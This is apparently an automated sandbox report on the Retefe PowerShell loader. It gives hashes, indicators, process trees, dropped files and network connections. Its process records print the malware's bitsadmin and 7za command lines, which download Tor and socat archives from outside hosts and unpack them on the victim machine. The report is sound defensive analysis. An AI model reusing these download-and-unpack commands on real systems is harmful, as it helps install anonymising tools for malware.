File name:

retefe.ps1

Full analysis: https://app.any.run/tasks/a9b51df7-88cd-410d-a5df-59cd884c796b
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: May 13, 2019, 10:44:20
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines
MD5:

7BF9ABF9E8B131245BC0853D7F5FA933

SHA1:

07FB198B48E8D8AE68AB1503C4DEFFC741A7E33A

SHA256:

622C46E081507A969D66EA24347E96A43ADD63AAF750C8CC66368AD24ECCEBB8

SSDEEP:

192:JFehO/kpoHSdyUIwizis3TWwcDJOLFaPzQBKCoXYOYVxOzRWB:JFeh2Zy/Iz523IOgOA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses BITADMIN.EXE for downloading application

      • cmd.exe (PID: 2008)
      • cmd.exe (PID: 3464)
      • cmd.exe (PID: 2036)
      • cmd.exe (PID: 3116)
    • Loads dropped or rewritten executable

      • powershell.exe (PID: 2240)
    • Application was dropped or rewritten from another process

      • 7za.exe (PID: 1688)
      • 7za.exe (PID: 3772)
    • Loads the Task Scheduler COM API

      • powershell.exe (PID: 2240)
  • SUSPICIOUS

    • Creates files in the program directory

      • powershell.exe (PID: 2240)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2240)
      • 7za.exe (PID: 1688)
    • Creates files in the user directory

      • powershell.exe (PID: 2240)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 2240)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
47
Monitored processes
11
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
drop and start drop and start start powershell.exe 7za.exe cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs 7za.exe no specs cmd.exe no specs bitsadmin.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
184bitsadmin /transfer /download /priority HIGH "https://tor.ybti.net/dist/torbrowser/8.0/tor-win32-0.3.3.9.zip" "C:\Users\admin\AppData\Local\Temp\PqeSU.zip" C:\Windows\system32\bitsadmin.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
2147954557
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\bitsadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
1688"C:\ProgramData\7za.exe" x -o"C:\Users\admin\AppData\Local\Temp\JobfSl5Ym" -y "C:\Users\admin\AppData\Local\Temp\NbTQAB7PU.zip" C:\ProgramData\7za.exe
powershell.exe
User:
admin
Company:
Igor Pavlov
Integrity Level:
MEDIUM
Description:
7-Zip Standalone Console
Exit code:
0
Version:
18.06
Modules
Images
c:\programdata\7za.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
2008"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://dist.torproject.org/torbrowser/8.0/tor-win32-0.3.3.9.zip" "C:\Users\admin\AppData\Local\Temp\PqeSU.zip" C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
2149122452
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2036"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://tor.ybti.net/dist/torbrowser/8.0/tor-win32-0.3.3.9.zip" "C:\Users\admin\AppData\Local\Temp\PqeSU.zip" C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
2147954557
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2240"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\admin\AppData\Local\Temp\retefe.ps1"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2712bitsadmin /transfer /download /priority HIGH "https://torproject.mirror.metalgamer.eu/dist/torbrowser/8.0/tor-win32-0.3.3.9.zip" "C:\Users\admin\AppData\Local\Temp\PqeSU.zip" C:\Windows\system32\bitsadmin.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
2147954557
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\bitsadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
3116"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\admin\AppData\Local\Temp\3ZU9c.zip" C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3348bitsadmin /transfer /download /priority HIGH "https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip" "C:\Users\admin\AppData\Local\Temp\3ZU9c.zip" C:\Windows\system32\bitsadmin.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\bitsadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ole32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
3464"C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://torproject.mirror.metalgamer.eu/dist/torbrowser/8.0/tor-win32-0.3.3.9.zip" "C:\Users\admin\AppData\Local\Temp\PqeSU.zip" C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
2147954557
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3772"C:\ProgramData\7za.exe" x -o"C:\ProgramData\VmkKxvDb" -y "C:\Users\admin\AppData\Local\Temp\PqeSU.zip" C:\ProgramData\7za.exepowershell.exe
User:
admin
Company:
Igor Pavlov
Integrity Level:
MEDIUM
Description:
7-Zip Standalone Console
Exit code:
2
Version:
18.06
Modules
Images
c:\programdata\7za.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
Total events
273
Read events
192
Write events
81
Delete events
0

Modification events

(PID) Process:(2240) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(2240) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(2240) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(2240) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2240) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(2240) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(2240) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
4294901760
(PID) Process:(2240) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(2240) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(2240) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
Executable files
29
Suspicious files
3
Text files
12
Unknown types
1

Dropped files

PID
Process
Filename
Type
2240powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TQ35KM5IFIHJSYA1SAG6.temp
MD5:
SHA256:
2240powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFe5ace.TMPbinary
MD5:
SHA256:
2240powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:
SHA256:
16887za.exeC:\Users\admin\AppData\Local\Temp\JobfSl5Ym\_rels\.relsxml
MD5:960E9C8E83A946638C0FB41C7F43C205
SHA256:9BE2774CC5E0ED372A7888EEC6B420292C32A9FEF91A51133EAFB58A6971DB40
2240powershell.exeC:\Users\admin\AppData\Local\Temp\NbTQAB7PU.zipcompressed
MD5:C081610379B2BD57B075BB3F385A5B1B
SHA256:3E16C6C423EC88857AFC1559A5E976F79C80F8EEC13C9F7B53971929165DFA49
16887za.exeC:\Users\admin\AppData\Local\Temp\JobfSl5Ym\TaskScheduler.nuspecxml
MD5:EA7AD4EB406BB5AAA11D125F5A0B875C
SHA256:5D345A892CF6670D7105B4C9F95089D14539BDCB118796AE28B893F81BFBF9B2
16887za.exeC:\Users\admin\AppData\Local\Temp\JobfSl5Ym\lib\net20\JetBrains.Annotations.xmlxml
MD5:3B8898C410A2B794806357AD21E5C950
SHA256:171E8C10A36AF4A5B3961832AA721CE2FFA9DFAB9E0AECCD61A35C0A0B6DF914
16887za.exeC:\Users\admin\AppData\Local\Temp\JobfSl5Ym\lib\net20\Microsoft.Win32.TaskScheduler.dllexecutable
MD5:59367BC43D9CDDA9B64BE0911BAFCF93
SHA256:A5CEDBB6A252C47D0F3D2828BB05A319E97EF9158F802A91723AF9B19F4FBD30
16887za.exeC:\Users\admin\AppData\Local\Temp\JobfSl5Ym\lib\net20\de\Microsoft.Win32.TaskScheduler.resources.dllexecutable
MD5:9073A31B78E174F240977FB6DB71A500
SHA256:40CF96D4459AA72BCCEACC32A7CDBFB2533E0BEB170FC20D53CA3C5213BA7F6A
16887za.exeC:\Users\admin\AppData\Local\Temp\JobfSl5Ym\lib\net20\es\Microsoft.Win32.TaskScheduler.resources.dllexecutable
MD5:6B6A96843744D68E329FEEF41AC7684D
SHA256:E7120939C325E9B497C87A1E8AF9BF6D852CBC3D0BDEA47559A7B198DFB0DE89
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
15
DNS requests
6
Threats
1

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
173.212.221.10:443
tor.ybti.net
Contabo GmbH
DE
suspicious
2240
powershell.exe
173.212.221.10:443
tor.ybti.net
Contabo GmbH
DE
suspicious
152.199.19.160:443
api.nuget.org
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
2240
powershell.exe
104.20.74.28:443
chocolatey.org
Cloudflare Inc
US
shared
2240
powershell.exe
94.130.28.204:443
dist.torproject.org
Hetzner Online GmbH
DE
suspicious
140.82.118.4:443
github.com
US
malicious
2240
powershell.exe
140.82.118.4:443
github.com
US
malicious
94.130.28.204:443
dist.torproject.org
Hetzner Online GmbH
DE
suspicious
2240
powershell.exe
5.45.108.219:443
torproject.mirror.metalgamer.eu
netcup GmbH
DE
unknown
5.45.108.219:443
torproject.mirror.metalgamer.eu
netcup GmbH
DE
unknown

DNS requests

Domain
IP
Reputation
api.nuget.org
  • 152.199.19.160
whitelisted
chocolatey.org
  • 104.20.74.28
  • 104.20.73.28
whitelisted
dist.torproject.org
  • 94.130.28.204
  • 38.229.72.19
  • 82.195.75.101
  • 138.201.14.197
whitelisted
torproject.mirror.metalgamer.eu
  • 5.45.108.219
unknown
tor.ybti.net
  • 173.212.221.10
suspicious
github.com
  • 140.82.118.4
malicious

Threats

PID
Process
Class
Message
2240
powershell.exe
Misc Attack
ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 190
No debug info